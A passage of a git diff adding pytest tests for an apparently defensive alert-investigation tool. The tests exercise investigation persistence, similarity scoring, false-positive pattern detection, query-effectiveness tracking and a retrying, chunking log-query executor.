find_similar_investigations tool.""" + + @pytest.mark.asyncio + async def test_find_similar_no_results(self, learning_tools: LearningTools) -> None: + """Test finding similar investigations with empty store.""" + result = await learning_tools.find_similar_investigations(alert_name="NonexistentAlert") + + assert result["found"] is False + assert result["investigations"] == [] + assert "No similar investigations" in result["message"] + + @pytest.mark.asyncio + async def test_find_similar_by_alert_name( + self, populated_learning_tools: LearningTools + ) -> None: + """Test finding similar investigations by alert name.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["investigations"]) >= 1 + + # Check investigation structure + inv = result["investigations"][0] + assert "investigation_id" in inv + assert "alert_name" in inv + assert "similarity_score" in inv + assert "matching_factors" in inv + assert "outcome" in inv + + @pytest.mark.asyncio + async def test_find_similar_by_technique(self, populated_learning_tools: LearningTools) -> None: + """Test finding similar investigations by technique.""" + result = await populated_learning_tools.find_similar_investigations( + technique_id="T1059.001" + ) + + assert result["found"] is True + assert result["count"] >= 1 + + # All results should have the matching technique + for inv in result["investigations"]: + assert inv["technique_id"] == "T1059.001" + + @pytest.mark.asyncio + async def test_find_similar_returns_summary( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns summary statistics.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "summary" in result + assert "completion_rate" in result["summary"] + assert "avg_evidence_count" in result["summary"] + assert "true_positives" in result["summary"] + assert "false_positives" in result["summary"] + + @pytest.mark.asyncio + async def test_find_similar_returns_guidance( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar returns investigation guidance.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + assert "guidance" in result + assert isinstance(result["guidance"], str) + + @pytest.mark.asyncio + async def test_find_similar_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that find_similar respects the limit parameter.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage", + limit=2, + ) + + assert len(result["investigations"]) <= 2 + + @pytest.mark.asyncio + async def test_find_similar_includes_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include effective queries.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # At least one investigation should have effective queries + has_queries = any(inv.get("effective_queries") for inv in result["investigations"]) + assert has_queries or result["count"] == 0 + + +class TestGetEffectiveQueries: + """Tests for get_effective_queries tool.""" + + @pytest.mark.asyncio + async def test_get_effective_no_data(self, learning_tools: LearningTools) -> None: + """Test getting effective queries with no data.""" + result = await learning_tools.get_effective_queries() + + assert result["found"] is False + assert result["queries"] == [] + assert "No query effectiveness data" in result["message"] + + @pytest.mark.asyncio + async def test_get_effective_queries_returns_results( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries with data.""" + result = await populated_learning_tools.get_effective_queries() + + assert result["found"] is True + assert result["count"] >= 1 + assert len(result["queries"]) >= 1 + + # Check query structure + query = result["queries"][0] + assert "query_pattern" in query + assert "total_uses" in query + assert "success_rate" in query + assert "evidence_rate" in query + + @pytest.mark.asyncio + async def test_get_effective_queries_filtered_by_alert( + self, populated_learning_tools: LearningTools + ) -> None: + """Test getting effective queries filtered by alert type.""" + result = await populated_learning_tools.get_effective_queries(alert_name="HighCPUUsage") + + # Should only return queries used for this alert + for query in result["queries"]: + assert "HighCPUUsage" in query["used_for_alerts"] + + @pytest.mark.asyncio + async def test_get_effective_queries_respects_limit( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that get_effective_queries respects the limit.""" + result = await populated_learning_tools.get_effective_queries(limit=1) + + assert len(result["queries"]) <= 1 + + @pytest.mark.asyncio + async def test_get_effective_queries_includes_recommendation( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that results include a recommendation.""" + result = await populated_learning_tools.get_effective_queries() + + if result["found"]: + assert "recommendation" in result + + +class TestCheckFalsePositivePattern: + """Tests for check_false_positive_pattern tool.""" + + @pytest.mark.asyncio + async def test_check_fp_no_history(self, learning_tools: LearningTools) -> None: + """Test checking FP pattern with no history.""" + result = await learning_tools.check_false_positive_pattern(alert_name="NewAlert") + + assert result["is_known_pattern"] is False + assert result["confidence"] == "low" + assert "No historical data" in result["message"] + + @pytest.mark.asyncio + async def test_check_fp_with_history(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with history.""" + result = await populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage" + ) + + assert "false_positive_rate" in result + assert "true_positives" in result or "is_known_pattern" in result + + @pytest.mark.asyncio + async def test_check_fp_high_rate_detection(self, store: InvestigationStore) -> None: + """Test detection of high false positive rate.""" + now = datetime.now(timezone.utc) + + # Create mostly false positive investigations + for i in range(10): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=i < 2, # Only 2/10 true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.check_false_positive_pattern(alert_name="NoisyAlert") + + # Should detect high FP rate (80%) + assert "false_positive_rate" in result + # Either known pattern or has rate info + assert result.get("is_known_pattern") or "80%" in result.get("false_positive_rate", "") + + @pytest.mark.asyncio + async def test_check_fp_with_fingerprint(self, populated_learning_tools: LearningTools) -> None: + """Test checking FP pattern with fingerprint.""" + result = await populated_learning_tools.check_false_positive_pattern( + alert_name="HighCPUUsage", + alert_fingerprint="rule-cpu-001", + ) + + # Should use fingerprint for more accurate matching + assert "confidence" in result + + +class TestGetInvestigationStatistics: + """Tests for get_investigation_statistics tool.""" + + @pytest.mark.asyncio + async def test_get_statistics_empty_store(self, learning_tools: LearningTools) -> None: + """Test getting statistics from empty store.""" + result = await learning_tools.get_investigation_statistics() + + assert result["total_investigations"] == 0 + + @pytest.mark.asyncio + async def test_get_statistics_with_data(self, populated_learning_tools: LearningTools) -> None: + """Test getting statistics with data.""" + result = await populated_learning_tools.get_investigation_statistics() + + assert result["total_investigations"] >= 1 + assert "status_distribution" in result + assert "performance" in result + assert "query_insights" in result + assert "labeling" in result + + @pytest.mark.asyncio + async def test_get_statistics_performance_metrics( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include performance metrics.""" + result = await populated_learning_tools.get_investigation_statistics() + + perf = result["performance"] + assert "avg_evidence_count" in perf + assert "avg_pyramid_level" in perf + assert "avg_duration_seconds" in perf + + @pytest.mark.asyncio + async def test_get_statistics_labeling_info( + self, populated_learning_tools: LearningTools + ) -> None: + """Test that statistics include labeling information.""" + result = await populated_learning_tools.get_investigation_statistics() + + labeling = result["labeling"] + assert "true_positives" in labeling + assert "false_positives" in labeling + # true_positive_rate may be None or a value + assert "true_positive_rate" in labeling + + +class TestGuidanceGeneration: + """Tests for guidance generation helper.""" + + @pytest.mark.asyncio + async def test_guidance_with_effective_queries( + self, populated_learning_tools: LearningTools + ) -> None: + """Test guidance includes effective query suggestions.""" + result = await populated_learning_tools.find_similar_investigations( + alert_name="HighCPUUsage" + ) + + # Guidance should mention queries if available + if result["found"]: + guidance = result["guidance"] + # Should have some guidance text + assert len(guidance) > 0 + + @pytest.mark.asyncio + async def test_guidance_with_high_tp_rate(self, store: InvestigationStore) -> None: + """Test guidance for high true positive rate alerts.""" + now = datetime.now(timezone.utc) + + # Create mostly true positive investigations + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"tp-inv-{i}", + alert_name="CriticalAlert", + alert_fingerprint="critical-rule", + severity="critical", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=i), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1000"], + queries_executed=[], + query_success_rate=0.8, + effective_queries=["{job='test'}"], + is_true_positive=True, # All true positives + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="CriticalAlert") + + assert result["found"] is True + # Should mention high TP rate in guidance + guidance = result["guidance"] + assert "true positive" in guidance.lower() or "thorough" in guidance.lower() + + +class TestEdgeCases: + """Tests for edge cases.""" + + @pytest.mark.asyncio + async def test_find_similar_with_all_none_params( + self, populated_learning_tools: LearningTools + ) -> None: + """Test find_similar with all None parameters.""" + result = await populated_learning_tools.find_similar_investigations() + + # Should still return results (recent investigations) + # or indicate no similar found + assert "found" in result + + @pytest.mark.asyncio + async def test_unicode_in_alert_name(self, store: InvestigationStore) -> None: + """Test handling of unicode in alert names.""" + now = datetime.now(timezone.utc) + + inv = StoredInvestigation( + investigation_id="unicode-inv", + alert_name="Alert \u2603 Snowman", # Unicode snowman + alert_fingerprint="unicode-rule", + severity="low", + technique_id=None, + technique_name=None, + started_at=now, + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + ) + store.store_investigation(inv) + + tools = LearningTools(store=store) + result = await tools.find_similar_investigations(alert_name="Alert \u2603 Snowman") + + assert result["found"] is True + + @pytest.mark.asyncio + async def test_very_long_query_pattern(self, store: InvestigationStore) -> None: + """Test handling of very long query patterns.""" + long_query = "{job='test'}" + " |= 'x'" * 100 + + for _ in range(3): + store.update_query_effectiveness( + query_pattern=long_query, + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + tools = LearningTools(store=store) + result = await tools.get_effective_queries() + + # Should handle long queries without error + assert result["found"] is True diff --git a/tests/test_persistence.py b/tests/test_persistence.py new file mode 100644 index 00000000..996240fc --- /dev/null +++ b/tests/test_persistence.py @@ -0,0 +1,537 @@ +"""Tests for the Investigation Persistence and Learning System.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.persistence import ( + InvestigationStore, + QueryEffectiveness, + StoredInvestigation, + get_investigation_store, + reset_investigation_store, +) + + +@pytest.fixture +def temp_db() -> Path: + """Create a temporary database file.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) / "test_investigations.db" + + +@pytest.fixture +def store(temp_db: Path) -> InvestigationStore: + """Create a fresh investigation store.""" + return InvestigationStore(temp_db) + + +@pytest.fixture +def sample_investigation() -> StoredInvestigation: + """Create a sample investigation for testing.""" + now = datetime.now(timezone.utc) + return StoredInvestigation( + investigation_id="inv-001", + alert_name="HighCPUUsage", + alert_fingerprint="rule-123", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=5, + highest_pyramid_level=3, + techniques_identified=["T1059.001", "T1086"], + queries_executed=[ + {"query": "{job='windows'}", "result_count": 10}, + {"query": "{job='linux'}", "result_count": 0}, + ], + query_success_rate=0.5, + effective_queries=["{job='windows'}"], + is_true_positive=True, + analyst_notes="Confirmed malicious activity", + metadata={"host": "server01", "user": "admin"}, + ) + + +class TestStoredInvestigation: + """Tests for StoredInvestigation dataclass.""" + + def test_to_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test conversion to dictionary.""" + data = sample_investigation.to_dict() + + assert data["investigation_id"] == "inv-001" + assert data["alert_name"] == "HighCPUUsage" + assert data["severity"] == "warning" + assert data["technique_id"] == "T1059.001" + assert data["status"] == "completed" + assert data["evidence_count"] == 5 + assert data["is_true_positive"] is True + assert "started_at" in data + assert "completed_at" in data + + def test_from_dict(self, sample_investigation: StoredInvestigation) -> None: + """Test creation from dictionary.""" + data = sample_investigation.to_dict() + restored = StoredInvestigation.from_dict(data) + + assert restored.investigation_id == sample_investigation.investigation_id + assert restored.alert_name == sample_investigation.alert_name + assert restored.severity == sample_investigation.severity + assert restored.technique_id == sample_investigation.technique_id + assert restored.status == sample_investigation.status + assert restored.evidence_count == sample_investigation.evidence_count + assert restored.is_true_positive == sample_investigation.is_true_positive + + def test_from_dict_with_missing_optional_fields(self) -> None: + """Test creation from dict with missing optional fields.""" + minimal_data = { + "investigation_id": "inv-min", + "alert_name": "TestAlert", + "alert_fingerprint": "fp-001", + "severity": "low", + "started_at": datetime.now(timezone.utc).isoformat(), + "completed_at": datetime.now(timezone.utc).isoformat(), + "duration_seconds": 100.0, + "status": "completed", + "evidence_count": 0, + "highest_pyramid_level": 0, + } + + investigation = StoredInvestigation.from_dict(minimal_data) + + assert investigation.investigation_id == "inv-min" + assert investigation.technique_id is None + assert investigation.techniques_identified == [] + assert investigation.queries_executed == [] + assert investigation.is_true_positive is None + + +class TestQueryEffectiveness: + """Tests for QueryEffectiveness dataclass.""" + + def test_success_rate_calculation(self) -> None: + """Test success rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.success_rate == 0.7 + + def test_evidence_rate_calculation(self) -> None: + """Test evidence rate property.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=10, + successful_executions=7, + evidence_producing=3, + alert_types=["AlertA"], + ) + + assert qe.evidence_rate == 0.3 + + def test_zero_executions(self) -> None: + """Test rates with zero executions.""" + qe = QueryEffectiveness( + query_pattern="{job='test'}", + total_executions=0, + successful_executions=0, + evidence_producing=0, + alert_types=[], + ) + + assert qe.success_rate == 0.0 + assert qe.evidence_rate == 0.0 + + +class TestInvestigationStore: + """Tests for InvestigationStore.""" + + def test_init_creates_schema(self, store: InvestigationStore) -> None: + """Test that schema is created on init.""" + with store._get_connection() as conn: + cursor = conn.cursor() + + # Check investigations table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='investigations'" + ) + assert cursor.fetchone() is not None + + # Check query_effectiveness table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='query_effectiveness'" + ) + assert cursor.fetchone() is not None + + # Check schema_info table exists + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='table' AND name='schema_info'" + ) + assert cursor.fetchone() is not None + + def test_store_and_retrieve_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test storing and retrieving an investigation.""" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.investigation_id == sample_investigation.investigation_id + assert retrieved.alert_name == sample_investigation.alert_name + assert retrieved.evidence_count == sample_investigation.evidence_count + assert retrieved.is_true_positive == sample_investigation.is_true_positive + + def test_get_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test retrieving a non-existent investigation.""" + result = store.get_investigation("nonexistent-id") + assert result is None + + def test_store_investigation_upsert( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test that storing an investigation twice updates it.""" + store.store_investigation(sample_investigation) + + # Modify and store again + sample_investigation.evidence_count = 10 + sample_investigation.status = "escalated" + store.store_investigation(sample_investigation) + + retrieved = store.get_investigation(sample_investigation.investigation_id) + + assert retrieved is not None + assert retrieved.evidence_count == 10 + assert retrieved.status == "escalated" + + def test_find_similar_investigations_by_fingerprint( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations by fingerprint.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_fingerprint=sample_investigation.alert_fingerprint + ) + + assert len(similar) == 1 + assert similar[0].investigation.investigation_id == sample_investigation.investigation_id + assert "same_alert_fingerprint" in similar[0].matching_factors + + def test_find_similar_investigations_by_technique(self, store: InvestigationStore) -> None: + """Test finding similar investigations by technique.""" + now = datetime.now(timezone.utc) + + # Create multiple investigations with same technique + for i in range(3): + inv = StoredInvestigation( + investigation_id=f"inv-{i}", + alert_name=f"Alert{i}", + alert_fingerprint=f"fp-{i}", + severity="warning", + technique_id="T1059.001", + technique_name="PowerShell", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=600.0, + status="completed", + evidence_count=i, + highest_pyramid_level=i, + techniques_identified=["T1059.001"], + queries_executed=[], + query_success_rate=0.5, + effective_queries=[], + ) + store.store_investigation(inv) + + similar = store.find_similar_investigations(technique_id="T1059.001") + + assert len(similar) == 3 + for sim in similar: + assert "same_technique" in sim.matching_factors + + def test_find_similar_investigations_no_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with no criteria returns recent.""" + store.store_investigation(sample_investigation) + + # Should return recent investigations + similar = store.find_similar_investigations() + + assert len(similar) >= 0 # May be empty or have results + + def test_find_similar_investigations_multiple_criteria( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test finding similar investigations with multiple criteria.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # alert_name (0.3) + technique (0.15) + severity (0.05) = 0.5 + # Use > 0.49 to account for floating-point precision + assert similar[0].similarity_score > 0.49 # Should have high score with multiple matches + + def test_update_query_effectiveness_new_query(self, store: InvestigationStore) -> None: + """Test updating effectiveness for a new query.""" + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + + # May not appear if total_executions < 3 threshold + # Let's add more executions + for _ in range(2): + store.update_query_effectiveness( + query_pattern="{job='test'}", + successful=True, + produced_evidence=True, + alert_type="TestAlert", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + assert len(effective) == 1 + assert effective[0].query_pattern == "{job='test'}" + assert effective[0].total_executions == 3 + + def test_update_query_effectiveness_existing_query(self, store: InvestigationStore) -> None: + """Test updating effectiveness for an existing query.""" + # Add initial record + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=False, + alert_type="AlertA", + ) + + # Update with evidence + store.update_query_effectiveness( + query_pattern="{job='existing'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective = store.get_effective_queries(min_evidence_rate=0.0, limit=10) + matching = [q for q in effective if q.query_pattern == "{job='existing'}"] + + assert len(matching) == 1 + assert matching[0].total_executions == 4 + assert matching[0].evidence_producing == 1 + assert "AlertA" in matching[0].alert_types + assert "AlertB" in matching[0].alert_types + + def test_get_effective_queries_filtered_by_alert_type(self, store: InvestigationStore) -> None: + """Test getting effective queries filtered by alert type.""" + # Add queries for different alert types + for _ in range(3): + store.update_query_effectiveness( + query_pattern="{job='alert_a'}", + successful=True, + produced_evidence=True, + alert_type="AlertA", + ) + store.update_query_effectiveness( + query_pattern="{job='alert_b'}", + successful=True, + produced_evidence=True, + alert_type="AlertB", + ) + + effective_a = store.get_effective_queries(alert_type="AlertA", min_evidence_rate=0.0) + effective_b = store.get_effective_queries(alert_type="AlertB", min_evidence_rate=0.0) + + assert len(effective_a) == 1 + assert effective_a[0].query_pattern == "{job='alert_a'}" + assert len(effective_b) == 1 + assert effective_b[0].query_pattern == "{job='alert_b'}" + + def test_get_statistics( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test getting overall statistics.""" + store.store_investigation(sample_investigation) + + stats = store.get_statistics() + + assert stats["total_investigations"] == 1 + assert "completed" in stats["status_distribution"] + assert stats["avg_evidence_count"] == 5.0 + assert stats["labeling"]["true_positives"] == 1 + assert stats["labeling"]["false_positives"] == 0 + + def test_get_statistics_empty_store(self, store: InvestigationStore) -> None: + """Test getting statistics from empty store.""" + stats = store.get_statistics() + + assert stats["total_investigations"] == 0 + assert stats["avg_evidence_count"] == 0 + assert stats["labeling"]["true_positives"] == 0 + + def test_label_investigation( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test labeling an investigation.""" + sample_investigation.is_true_positive = None + store.store_investigation(sample_investigation) + + # Label as false positive + result = store.label_investigation( + investigation_id=sample_investigation.investigation_id, + is_true_positive=False, + analyst_notes="Benign activity", + ) + + assert result is True + + retrieved = store.get_investigation(sample_investigation.investigation_id) + assert retrieved is not None + assert retrieved.is_true_positive is False + assert retrieved.analyst_notes == "Benign activity" + + def test_label_nonexistent_investigation(self, store: InvestigationStore) -> None: + """Test labeling a non-existent investigation.""" + result = store.label_investigation( + investigation_id="nonexistent", + is_true_positive=True, + ) + + assert result is False + + def test_get_false_positive_patterns(self, store: InvestigationStore) -> None: + """Test getting false positive patterns.""" + now = datetime.now(timezone.utc) + + # Create multiple false positive investigations with same fingerprint + for i in range(5): + inv = StoredInvestigation( + investigation_id=f"fp-inv-{i}", + alert_name="NoisyAlert", + alert_fingerprint="noisy-rule-001", + severity="low", + technique_id="T1000", + technique_name="Test", + started_at=now - timedelta(minutes=10), + completed_at=now, + duration_seconds=60.0, + status="completed", + evidence_count=0, + highest_pyramid_level=0, + techniques_identified=[], + queries_executed=[], + query_success_rate=0.0, + effective_queries=[], + is_true_positive=False, + ) + store.store_investigation(inv) + + patterns = store.get_false_positive_patterns(min_occurrences=3) + + assert len(patterns) >= 1 + noisy_pattern = next((p for p in patterns if p["alert_name"] == "NoisyAlert"), None) + assert noisy_pattern is not None + assert noisy_pattern["occurrences"] >= 3 + + +class TestGlobalStore: + """Tests for global store functions.""" + + def test_get_investigation_store_creates_default(self) -> None: + """Test that get_investigation_store creates a default store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store = get_investigation_store(db_path) + + assert store is not None + assert store.db_path == db_path + + reset_investigation_store() + + def test_get_investigation_store_returns_same_instance(self) -> None: + """Test that get_investigation_store returns the same instance.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + store2 = get_investigation_store() + + assert store1 is store2 + + reset_investigation_store() + + def test_reset_investigation_store(self) -> None: + """Test resetting the global store.""" + reset_investigation_store() + + with tempfile.TemporaryDirectory() as tmpdir: + db_path = Path(tmpdir) / "test.db" + store1 = get_investigation_store(db_path) + reset_investigation_store() + + # After reset, a new call should create new instance + store2 = get_investigation_store(db_path) + + assert store1 is not store2 + + reset_investigation_store() + + +class TestSimilarityScoring: + """Tests for similarity calculation.""" + + def test_similarity_score_all_factors( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test similarity score with all matching factors.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + alert_name=sample_investigation.alert_name, + alert_fingerprint=sample_investigation.alert_fingerprint, + technique_id=sample_investigation.technique_id, + severity=sample_investigation.severity, + ) + + assert len(similar) == 1 + # 0.5 (fingerprint) + 0.3 (name) + 0.15 (technique) + 0.05 (severity) = 1.0 + assert similar[0].similarity_score == 1.0 + assert len(similar[0].matching_factors) == 4 + + def test_similarity_score_partial_match( + self, store: InvestigationStore, sample_investigation: StoredInvestigation + ) -> None: + """Test similarity score with partial match.""" + store.store_investigation(sample_investigation) + + similar = store.find_similar_investigations( + technique_id=sample_investigation.technique_id, + ) + + assert len(similar) == 1 + assert similar[0].similarity_score == 0.15 + assert similar[0].matching_factors == ["same_technique"] diff --git a/tests/test_query_resilience.py b/tests/test_query_resilience.py new file mode 100644 index 00000000..2bd12438 --- /dev/null +++ b/tests/test_query_resilience.py @@ -0,0 +1,516 @@ +"""Tests for the Query Resilience module.""" + +import asyncio +from typing import Any +from unittest.mock import AsyncMock + +import pytest + +from ares.core.query_resilience import ( + QueryAttempt, + QueryResilientExecutor, + QueryStats, + get_resilient_executor, + reset_resilient_executor, +) + + +class TestQueryAttempt: + """Tests for QueryAttempt dataclass.""" + + def test_create_successful_attempt(self) -> None: + """Test creating a successful query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=1, + success=True, + result_count=100, + duration_ms=500, + ) + + assert attempt.success is True + assert attempt.error is None + assert attempt.result_count == 100 + + def test_create_failed_attempt(self) -> None: + """Test creating a failed query attempt.""" + attempt = QueryAttempt( + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + attempt_number=2, + success=False, + error="Timeout after 30s", + duration_ms=30000, + ) + + assert attempt.success is False + assert attempt.error == "Timeout after 30s" + assert attempt.result_count == 0 + + +class TestQueryStats: + """Tests for QueryStats dataclass.""" + + def test_default_values(self) -> None: + """Test default values for QueryStats.""" + stats = QueryStats() + + assert stats.total_attempts == 0 + assert stats.successful_attempts == 0 + assert stats.timeout_count == 0 + assert stats.retry_count == 0 + assert stats.time_range_reductions == 0 + assert stats.attempts == [] + + def test_success_rate_calculation(self) -> None: + """Test success rate calculation.""" + stats = QueryStats(total_attempts=10, successful_attempts=7) + + assert stats.success_rate == 0.7 + + def test_success_rate_zero_attempts(self) -> None: + """Test success rate with zero attempts.""" + stats = QueryStats(total_attempts=0, successful_attempts=0) + + assert stats.success_rate == 0.0 + + +class TestQueryResilientExecutor: + """Tests for QueryResilientExecutor.""" + + def test_init_default_values(self) -> None: + """Test default initialization values.""" + executor = QueryResilientExecutor() + + assert executor.max_retries == 3 + assert executor.initial_timeout == 30.0 + assert executor.enable_chunking is True + assert executor.chunk_size_minutes == 30 + + def test_init_custom_values(self) -> None: + """Test initialization with custom values.""" + executor = QueryResilientExecutor( + max_retries=5, + initial_timeout=60.0, + enable_chunking=False, + chunk_size_minutes=15, + ) + + assert executor.max_retries == 5 + assert executor.initial_timeout == 60.0 + assert executor.enable_chunking is False + assert executor.chunk_size_minutes == 15 + + @pytest.mark.asyncio + async def test_execute_with_resilience_success(self) -> None: + """Test successful query execution.""" + executor = QueryResilientExecutor() + + mock_query_fn = AsyncMock( + return_value={ + "status": "success", + "data": {"result": [{"values": [[1, "log1"], [2, "log2"]]}]}, + } + ) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + assert result["status"] == "success" + assert "_resilience_metadata" in result + assert result["_resilience_metadata"]["retry_count"] == 0 + assert executor.stats.successful_attempts == 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_timeout_retry(self) -> None: + """Test retry behavior on timeout.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + call_count = 0 + + async def timeout_then_success(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + if call_count < 2: + await asyncio.sleep(1) # Will timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=timeout_then_success) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "success" + assert executor.stats.timeout_count >= 1 + + @pytest.mark.asyncio + async def test_execute_with_resilience_all_retries_fail(self) -> None: + """Test behavior when all retries fail.""" + executor = QueryResilientExecutor(max_retries=2, initial_timeout=0.1) + + async def always_timeout(**kwargs: Any) -> dict[str, Any]: + await asyncio.sleep(1) # Always timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=always_timeout) + + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + assert result["status"] == "error" + assert "suggestion" in result + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_error_response(self) -> None: + """Test handling of error responses from query function.""" + executor = QueryResilientExecutor(max_retries=2) + + mock_query_fn = AsyncMock( + return_value={ + "status": "error", + "error": "timeout exceeded while executing query", + } + ) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T10:30:00Z", + ) + + # Should retry on timeout errors + assert executor.stats.timeout_count > 0 + + @pytest.mark.asyncio + async def test_execute_with_resilience_time_range_reduction(self) -> None: + """Test time range reduction on persistent failures.""" + executor = QueryResilientExecutor(max_retries=1, initial_timeout=0.05) + + call_count = 0 + received_time_ranges: list[tuple[str, str]] = [] + + async def track_time_ranges(**kwargs: Any) -> dict[str, Any]: + nonlocal call_count + call_count += 1 + received_time_ranges.append((kwargs.get("start_time", ""), kwargs.get("end_time", ""))) + + # Fail first few, succeed later with smaller range + if call_count < 3: + await asyncio.sleep(1) # Timeout + return {"status": "success", "data": {"result": []}} + + mock_query_fn = AsyncMock(side_effect=track_time_ranges) + + await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T11:00:00Z", + ) + + # Should have reduced time range at some point + assert executor.stats.time_range_reductions > 0 + + @pytest.mark.asyncio + async def test_execute_chunked_for_large_range(self) -> None: + """Test that large time ranges trigger chunked execution.""" + executor = QueryResilientExecutor(chunk_size_minutes=30) + + call_times: list[str] = [] + + async def track_chunks(**kwargs: Any) -> dict[str, Any]: + call_times.append(kwargs.get("start_time", "")) + return {"status": "success", "data": {"result": [{"values": [[1, "log"]]}]}} + + mock_query_fn = AsyncMock(side_effect=track_chunks) + + # 3 hour range should trigger chunking + result = await executor.execute_with_resilience( + query_fn=mock_query_fn, + query="{job='test'}", + start_time="2024-01-15T10:00:00Z", + end_time="2024-01-15T13:00:00Z", + ) + + # Should have made multiple chunk calls (3 hours / 30 min = 6 chunks) + assert len(call_times) >= 4 + assert "_chunked_execution" in result + + @pytest.mark.asyncio + async def test_execute_chunked_disabled(self) -> None: + """Test that chunking can be disabled.""" + executor = QueryResilientExecutor(enable_chunking=False) + 